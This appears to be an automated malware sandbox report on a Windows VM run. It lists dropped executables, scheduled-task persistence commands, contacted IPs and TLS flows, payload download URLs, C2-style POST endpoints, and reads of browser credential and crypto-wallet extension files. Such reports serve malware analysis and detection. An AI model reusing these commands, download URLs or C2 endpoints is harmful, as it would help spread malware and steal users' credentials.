Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 6, 2023, 7:39 a.m. | Sept. 6, 2023, 7:42 a.m. |
Process | PID | Command line |
---|---|---|
EPOgquOT1MnP1nqso8haYw46.exe | 1536 | "C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe" |
regsvr32.exe | 3040 | "C:\Windows\System32\regsvr32.exe" /U .\VVTQR9K.VA3 -s |
U_WUTTisAZX3VLe2b40_scVK.exe | 2760 | "C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe" |
nPtRtTHIn9wndsrAGmvS3n2G.exe | 2752 | "C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe" |
vbc.exe | 2608 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" |
sVRSTvhMzuBInyoVatf1LIkj.exe | 1616 | "C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe" |
Install.exe | 1784 | .\Install.exe /rpdidWAf "525403" /S |
Ms6gVLaCMj3QjsT0nxwUAzQV.exe | 2756 | "C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe" |
x7v28_ox_gsKhD1Q9EW3AnPz.exe | 1332 | "C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe" |
kSIDO1g7b2Ov3jXySZx1v2JG.exe | 1308 | "C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe" |
schtasks.exe | 2816 | schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST |
schtasks.exe | 2884 | schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST |
IP Address | Status | Action |
---|---|---|
176.123.9.85 | Active | Moloch |
185.225.74.51 | Active | Moloch |
104.18.145.235 | Active | Moloch |
104.18.146.235 | Active | Moloch |
104.21.59.53 | Active | Moloch |
104.244.42.65 | Active | Moloch |
104.26.5.15 | Active | Moloch |
104.26.9.59 | Active | Moloch |
121.254.136.18 | Active | Moloch |
141.95.126.89 | Active | Moloch |
148.251.234.93 | Active | Moloch |
149.154.167.99 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.193.129 | Active | Moloch |
172.67.197.101 | Active | Moloch |
172.67.75.163 | Active | Moloch |
172.67.75.166 | Active | Moloch |
179.43.158.2 | Active | Moloch |
185.225.73.32 | Active | Moloch |
193.42.32.118 | Active | Moloch |
208.67.104.60 | Active | Moloch |
213.180.204.24 | Active | Moloch |
23.32.56.80 | Active | Moloch |
34.117.59.81 | Active | Moloch |
45.15.156.229 | Active | Moloch |
45.9.74.80 | Active | Moloch |
62.217.160.2 | Active | Moloch |
77.88.55.60 | Active | Moloch |
85.208.136.10 | Active | Moloch |
87.240.129.133 | Active | Moloch |
87.240.137.140 | Active | Moloch |
93.186.225.194 | Active | Moloch |
94.142.138.131 | Active | Moloch |
94.156.253.187 | Active | Moloch |
95.142.206.0 | Active | Moloch |
95.142.206.1 | Active | Moloch |
95.142.206.3 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49166 77.88.55.60:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=*.xn--d1acpjx3f.xn--p1ai | e4:ba:b2:7f:bf:93:b8:22:10:26:70:37:9c:03:1a:9d:fb:23:17:24 |
TLSv1 192.168.56.101:49177 104.26.5.15:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.101:49167 62.217.160.2:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 | C=RU, ST=Moscow, L=Moscow, O=VK LLC, CN=*.dzen.ru | 6a:31:14:29:60:07:c9:c6:17:7b:d1:27:ad:53:57:ec:d8:c1:d8:d2 |
TLSv1 192.168.56.101:49176 104.26.5.15:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.101:49168 213.180.204.24:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 | C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=sso.passport.yandex.ru | f0:52:26:54:41:65:2b:6a:37:7b:c1:5b:de:9c:e9:d4:41:c6:81:2d |
TLSv1 192.168.56.101:49171 172.67.193.129:443 | C=US, O=Let's Encrypt, CN=E1 | CN=ironhost.io | 1f:0b:7a:47:6b:7f:71:b9:9c:82:0e:4f:f5:e8:7c:05:28:03:e7:8e |
TLSv1 192.168.56.101:49193 93.186.225.194:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49207 172.67.197.101:443 | C=US, O=Let's Encrypt, CN=E1 | CN=preconcert.pw | 60:b2:a3:3e:2f:80:57:cd:6f:c1:a3:e9:b3:c6:cb:95:41:83:4a:64 |
TLSv1 192.168.56.101:49205 104.21.59.53:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=sergejbukotko.com | f1:9c:9e:67:d8:1b:22:61:4a:4d:a0:fc:b3:45:84:76:9e:9d:2d:27 |
TLSv1 192.168.56.101:49240 95.142.206.3:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.101:49239 93.186.225.194:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49249 95.142.206.1:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.101:49231 93.186.225.194:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49243 93.186.225.194:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49248 93.186.225.194:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49186 172.67.75.163:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65 |
TLSv1 192.168.56.101:49238 93.186.225.194:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49242 87.240.137.140:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.101:49245 95.142.206.0:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.101:49244 93.186.225.194:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49246 87.240.137.140:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.101:49280 104.26.5.15:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.101:49279 172.67.75.166:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.101:49288 87.240.129.133:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49297 87.240.129.133:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49264 104.26.9.59:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65 |
TLSv1 192.168.56.101:49298 95.142.206.1:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
section | .vmp0 |
section | .vmp1 |
section | .vmp2 |
resource name | PNG |
resource name | None |
Suspicious features | Suspicious request |
---|---|
GET method with no useragent header, Connection to IP address | GET http://193.42.32.118/api/tracemap.php |
GET method with no useragent header, Connection to IP address | GET http://94.142.138.131/api/tracemap.php |
POST method with no referer header, Connection to IP address | POST http://94.142.138.131/api/firecom.php |
Connection to IP address | HEAD http://94.156.253.187/download/WWW14_n.exe |
Connection to IP address | GET http://94.156.253.187/download/WWW14_n.exe |
POST method with no referer header, Connection to IP address | POST http://94.142.138.131/api/firegate.php |
Connection to IP address | GET http://45.15.156.229/api/tracemap.php |
POST method with no referer header, Connection to IP address | POST http://45.15.156.229/api/firegate.php |
Connection to IP address | HEAD http://45.9.74.80/ummaa.exe |
Connection to IP address | HEAD http://45.9.74.80/super.exe |
Connection to IP address | GET http://45.9.74.80/ummaa.exe |
Connection to IP address | GET http://45.9.74.80/super.exe |
request | GET http://193.42.32.118/api/tracemap.php |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://94.142.138.131/api/tracemap.php |
request | POST http://94.142.138.131/api/firecom.php |
request | GET http://www.maxmind.com/geoip/v2.1/city/me |
request | HEAD http://94.156.253.187/download/WWW14_n.exe |
request | GET http://94.156.253.187/download/WWW14_n.exe |
request | POST http://94.142.138.131/api/firegate.php |
request | HEAD http://red.mk/netTime.exe |
request | GET http://red.mk/netTime.exe |
request | GET http://45.15.156.229/api/tracemap.php |
request | POST http://45.15.156.229/api/firegate.php |
request | HEAD http://45.9.74.80/ummaa.exe |
request | HEAD http://45.9.74.80/super.exe |
request | GET http://45.9.74.80/ummaa.exe |
request | GET http://45.9.74.80/super.exe |
request | HEAD http://230809204625331.nes.dtf99.top/f/fikim0809331.exe |
request | GET http://230809204625331.nes.dtf99.top/f/fikim0809331.exe |
request | GET https://yandex.ru/ |
request | GET https://dzen.ru/?yredirect=true |
request | GET https://sso.passport.yandex.ru/push?uuid=bc95c885-a33d-4f0b-a172-5792d56f2b99&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue |
request | GET https://db-ip.com/ |
request | POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self |
request | GET https://api.myip.com/ |
request | GET https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 |
request | GET https://sergejbukotko.com/7725eaa6592c80f8124e769b4e8a07f7.exe |
request | GET https://preconcert.pw/setup294.exe |
request | GET https://vk.com/doc44017378_668841700?hash=B7naXG9fPpueUKaZxzbzFzqgThiLopd9A232GVSoLbD&dl=VDCn0RuU4RRcIuzpA6hHZu4JCvVt7UCUAmWFRORbSKs&api=1&no_preview=1 |
request | GET https://vk.com/doc44017378_668913178?hash=82bcV2gCZ1FH8Z8HToaxuiwCiEN2mz2z1qfoXJTCPC0&dl=ErxeeY7X3LIyZIBiZ0QDMkzCLk2vvDO29uX36h22aek&api=1&no_preview=1#u9 |
request | GET https://sun6-23.userapi.com/c909618/u44017378/docs/d58/502f8d1b7c6f/Synapse.bmp?extra=7ymvw_aFwN4_Uj7FsOWPKcOeA3Uvoj8EikYjHvdatt0X3JP-3DmTnc04rqW9o15Tpv6WRsx3NGvtPS7zQz6ZuNvop6Jj1TXski6zguIEMge-ITDtAes8MpdXIiCKNbvKN4nbBz6NMzSp29ZK |
request | GET https://vk.com/doc44017378_668679037?hash=6lxdrm9NUkSryZCfzYZn4zR2sOTXzaKgfQIcVCaPnvX&dl=FLqYTpktPSSWsXhtSyyzRawRyuZZexn7WIKXiXEZBv4&api=1&no_preview=1 |
request | GET https://psv4.userapi.com/c909328/u44017378/docs/d20/80a165d7642a/3c8fttmg7n06dp.bmp?extra=nuZcn5b8fGh0uPRKfbUAXX0VAMxL-cYveJG88PCotdD--pDq-7gxijOyIWQPtaUUAWSIRH_w1wstuzNboJLwKcBxW1Y6MIjCb1xhxyymyAxolfvAbMP9rCDe9gfZUPLDuOK0pAEC8-MuwAkw |
request | GET https://sun6-20.userapi.com/c909618/u44017378/docs/d36/c9a88b9c7135/PL_Client.bmp?extra=tJtT3z6UbzYseJPa76j1zRBj1wmyid3YaDvAzaMsz31tqOzwexxS6SL75PPvYs4H2kzJbhj1WI3RcZekL6A_lMuCQ7wlgzvR82UbZKpo_7rDNXDLKPfZIU6wTZ5q87vSoPPRjK5zIRkegmYD |
request | GET https://vk.com/doc44017378_668850966?hash=seNAc9XpZGb24lXnAxVAwPiPVaSTe6IiTQaY7IFhggw&dl=A9mazd4TmUx700iSSJAZzZTPnbX30hG5PEtIhQs2FVw&api=1&no_preview=1#utube |
request | GET https://vk.com/doc44017378_668685574?hash=2Z9kWDMxHv9Bg52ieOFMjjyZlIe2LzZhpXJtbJfi2jD&dl=MckLSTrLnFqxzbDQcQsY8zw8KxvNLWnEyU8AMbhyK6s&api=1&no_preview=1#WW1 |
request | GET https://sun6-21.userapi.com/c909628/u44017378/docs/d11/7f1a7c274f11/WWW1.bmp?extra=ibUwsIlBLQfXz5F54C2lVB4_UNTN1SYsuHJjPdJG1kmKXbQKYUdmzOpzkBzvq_CQ0kTWEzPmDitIXdL62nwV1Wz6vYHp9FTHjt_sDl-d0N1MlyijNg1uwrPaBxnTvlsmksXyhzo9dFkQw3Dx |
request | GET https://vk.com/doc44017378_668897025?hash=9izn0TzhC6Gq52AYs6wKluNJs8IMGa5IygoIE2NWiZX&dl=RzpPQgkrU5Bo3xTNnupfnzibo1sU36B0QqzJYdEUq3c&api=1&no_preview=1#redcl |
request | GET https://psv4.userapi.com/c235131/u44017378/docs/d5/eb6fe76df516/red.bmp?extra=ME0T5ttRod9kvT9aKKSwe-oAdBL69d6YUKjB4zWwRSSWsFL7VU3KidZTPIhbjE0zWgoso1_RHm-VuqcNV5k7SY-fZDpTkZFPHptlTeudtXPzawqATgpx9GnpEDrul3HPvZeDLFV3JEzI7tmA |
request | GET https://vk.com/doc44017378_668777192?hash=bErtt2Itw8CZPTouyuXblBKb3pLfVImQzvGWnZ4CyVs&dl=vm2AArvcYQaQAETnMlmPKTg0CoqMAAqRh2fogvAYbWP&api=1&no_preview=1#tmwvr |
request | GET https://sun6-21.userapi.com/c235131/u44017378/docs/d58/cc01f1bebaed/tmvwr.bmp?extra=q1LcznyK48tN8Wen35rZ4SsDNwN0UeWZ55tLITfBZg-6OTIEQfzGqel91B2rOXtWrIKTnt-LHmOoR4Rgiv5jb_s-93At_nSn5l0lxswHLYTdEqposLIc_-NG6GXefWaiEN4nocBNujY4KphO |
request | POST http://94.142.138.131/api/firecom.php |
request | POST http://94.142.138.131/api/firegate.php |
request | POST http://45.15.156.229/api/firegate.php |
request | POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self |
Domain | Description |
---|---|
preconcert.pw | Palau domain TLD |
yandex.ru | Russian Federation domain TLD |
iplis.ru | Russian Federation domain TLD |
sso.passport.yandex.ru | Russian Federation domain TLD |
dzen.ru | Russian Federation domain TLD |
230809204625331.nes.dtf99.top | Generic top level domain TLD |
description | qZa2Z7Puv7E4iAuW3ONvhvPf.exe tried to sleep 133 seconds, actually delayed analysis time by 133 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn |
domain | ipinfo.io |
file | C:\Users\test22\AppData\Local\Temp\7zSEAF2.tmp\Install.exe |
file | C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe |
file | C:\Users\test22\Pictures\Minor Policy\hqwRTbVrg6JO8voBy_voyZiR.exe |
file | C:\Users\test22\Pictures\Minor Policy\qUbgMoNM2GXIKNuZhrcGVO8V.exe |
file | C:\Users\test22\Pictures\Minor Policy\1gOAmuVXzOKI5MyMYhf8xuu4.exe |
file | C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe |
file | C:\Users\test22\AppData\Local\Temp\7zSE0B1.tmp\Install.exe |
file | C:\Users\test22\Pictures\Minor Policy\qyFjl2MYt6qjym_635ASMf8k.exe |
file | C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe |
file | C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe |
file | C:\Users\test22\Pictures\Minor Policy\U5Uc9En5niLiOuW0y1E0qzQw.exe |
file | C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe |
file | C:\Users\test22\Pictures\Minor Policy\Xk9zE3Cf0Cb9GHLSDNfQ7RMz.exe |
file | C:\Users\test22\Documents\qZa2Z7Puv7E4iAuW3ONvhvPf.exe |
file | C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe |
file | C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe |
cmdline | schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST |
cmdline | "C:\Windows\System32\regsvr32.exe" /U .\VVTQR9K.VA3 -s |
cmdline | schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST |
cmdline | regsvr32 /U .\VVTQR9K.VA3 -s |
file | C:\Users\test22\Documents\qZa2Z7Puv7E4iAuW3ONvhvPf.exe |
file | C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe |
file | C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe |
file | C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe |
file | C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe |
file | C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe |
file | C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe |
file | C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe |
file | C:\Users\test22\AppData\Local\Temp\VvTQR9K.VA3 |
wmi | <INVALID POINTER> |